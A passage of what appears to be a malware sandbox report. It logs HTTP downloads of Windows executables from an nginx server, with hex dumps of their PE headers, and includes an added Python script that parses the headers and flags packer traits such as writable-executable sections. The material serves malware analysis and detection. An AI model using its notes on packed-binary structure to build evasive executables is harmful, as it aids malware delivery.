00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:14 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
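Every response body above starts with an MZ/PE header served as application/octet-stream over plain HTTP, and the section tables visible in the dumps carry names such as "hrrnbomn", "cbgcjyrp", ".taggant" and runs of spaces. The following is an added example, not part of the Joe Sandbox report, that parses such a "Data Raw" dump with Python's struct module to recover the COFF header, the optional header fields that matter for triage, and the section table, then applies a few static packer tells. The embedded bytes are the first 656 bytes (DOS header, PE header and all seven section headers) of the 1775616-byte response dumped immediately above, re-wrapped to 32 bytes per row. The heuristics (a writable and executable section more than 8x larger in memory than on disk, blank section names, entry point in the last section) are the example's own thresholds, not something the report states.

```python
"""Parse a sandbox 'Data Raw' hex dump as a PE image: architecture, link
timestamp, entry point and the section table, plus cheap packer tells."""
import struct
from datetime import datetime, timezone

# Constructed sample: the first 656 bytes (DOS header, PE header and all seven
# section headers) of the 1775616-byte response body dumped above, re-wrapped
# to 32 bytes per row. Nothing past the section table is needed here.
SAMPLE_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00
00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00
04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00
55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20
00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0
2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00
00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e
00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0
63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0
"""

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def hex_dump_to_bytes(dump: str) -> bytes:
    """Convert 'Data Raw' text (hex octets separated by any whitespace) to bytes."""
    return bytes.fromhex("".join(dump.split()))


def parse_pe_headers(data: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                       # IMAGE_OPTIONAL_HEADER starts here
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    if magic == 0x10B:                        # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                      # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    sections, off = [], opt + opt_size        # section table follows the optional header
    for _ in range(nsections):
        raw_name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, off)
        sections.append({"name": raw_name.split(b"\0", 1)[0].decode("latin-1"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": rawsize, "raw_pointer": rawptr, "flags": flags})
        off += 40
    return {"machine": machine, "num_sections": nsections, "timestamp": timestamp,
            "link_time": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
            "entry_point": entry, "image_base": image_base, "sections": sections}


def packer_indicators(info: dict) -> dict:
    """Static tells that the image unpacks itself at run time (assumed thresholds)."""
    secs, entry = info["sections"], info["entry_point"]
    entry_section = next((s["name"] for s in secs if s["virtual_address"] <= entry
                          < s["virtual_address"] + max(s["virtual_size"], s["raw_size"])), None)
    wx = [s for s in secs
          if s["flags"] & IMAGE_SCN_MEM_EXECUTE and s["flags"] & IMAGE_SCN_MEM_WRITE]
    # A W+X section that is tiny on disk but large in memory is where a packer
    # stub writes the decrypted payload; 8x is an assumed threshold, not a standard.
    inflated = [s["name"] for s in wx if s["virtual_size"] > 8 * s["raw_size"]]
    return {"entry_section": entry_section,
            "entry_in_last_section": bool(secs) and entry_section == secs[-1]["name"],
            "blank_names": sum(1 for s in secs if not s["name"].strip()),
            "wx_count": len(wx), "inflated_wx": inflated}


if __name__ == "__main__":
    pe = parse_pe_headers(hex_dump_to_bytes(SAMPLE_HEX))
    print(f"machine={pe['machine']:#x} sections={pe['num_sections']} "
          f"linked={pe['link_time']} entry={pe['entry_point']:#x}")
    for s in pe["sections"]:
        print(f"  {s['name']!r:12} va={s['virtual_address']:#010x} vsize={s['virtual_size']:#09x} "
              f"raw={s['raw_size']:#09x} flags={s['flags']:#010x}")
    print(packer_indicators(pe))
```

On this dump the parser reports a 32-bit image (machine 0x14c) with seven sections, two of them named only with spaces, five marked writable and executable, an entry point that sits at the start of the final ".taggant" section, and one W+X section of 0x200 bytes on disk that expands to 0x2ac000 bytes in memory. That is the on-disk shape of what the overview's "Detected unpacking (changes PE section rights)" signature observes at run time, and it can be checked on a captured download before anything is executed.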
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:21 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:26 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 00 00 a0 9c 00 00 a2 03 00 00 74 99 00 00 00 00 00 
00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:24 GMTContent-Type: application/octet-streamContent-Length: 2155008Last-Modified: Tue, 11 Feb 2025 17:11:35 GMTConnection: keep-aliveETag: "67ab84c7-20e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 51 4b 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ad 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 
90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 70 74 66 73 68 65 00 30 1a 00 00 90 31 00 00 24 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 67 6f 62 61 66 74 6d 00 10 00 00 00 c0 4b 00 00 04 00 00 00 bc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 c0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:31 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
